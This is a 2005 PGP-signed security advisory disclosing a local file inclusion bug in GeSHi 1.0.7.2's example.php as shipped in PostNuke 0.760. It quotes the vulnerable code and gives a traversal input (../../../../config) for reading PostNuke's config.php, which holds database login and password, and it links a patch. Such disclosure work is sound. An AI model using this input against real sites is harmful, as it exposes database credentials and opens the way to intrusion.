-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [GeSHi Local PHP file inclusion 1.0.7.2] Author: Maksymilian Arciemowicz ( cXIb8O3 ).17 Date: 21.9.2005 from SECURITYREASON.COM - --- 0.Description --- GeSHi started as a mod for the phpBB forum system, to enable highlighting of more languages than the available (which was 0 ;)). However, it quickly spawned into an entire project on its own. But now it has been released, work continues on a mod for phpBB - and hopefully for many forum systems, blogs and other web-based systems. Several systems are using GeSHi now, including: PostNuke - A popular open source CMS Docuwiki - An advanced wiki engine gtk.php.net - Their manual uses GeSHi for syntax highlighting WordPress - A powerful blogging system PHP-Fusion - A constantly evovling CMS SQL Manager - A Postgres DBAL Mambo - A popular open source CMS MediaWiki - A leader in Wikis TikiWiki - A megapowerful Wiki/CMS, and one I personally use RWeb - A site-building tool - --- 1. Local (PHP) file inclusion --- I have found one bug in file ./contrib/example.php This file exists in standart packet GeSHi. In file: - -10-18-line--- include('../geshi.php'); if ( isset($_POST['submit']) ) { if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']); if ( !strlen(trim($_POST['source'])) ) { $_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php')); $_POST['language'] = 'php'; } - -10-18-line--- Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can read any php file (for example in postnuke -config.php-). You need use varible $_POST['language'] wher is path to php file. I have tested this bug in GeSHi package and in PostNuke 0.760. PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php) We can read config.php in PostNuke where we have login, password, dbname and dbhost. All variables needed to log in to database. So we can just use this exploit below : - --- EXPLOIT TESTED IN POSTNUKE 0.760 ---

Path to file:
example: ../../../../config

- --- EXPLOIT FOR POSTNUKE 0.760 --- [HOST] = example. http://www.securityreason.com/postnuke/html any questions? ;] - --- 2. How to fix --- Patch http://securityreason.com/patch/2 works in PostNuke 0.760 or new version of script 1.0.7.3 - --- 3. Greets --- sp3x - --- 4.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm MWVTap2Adcne2IMt7OpZHmM= =JulS -----END PGP SIGNATURE-----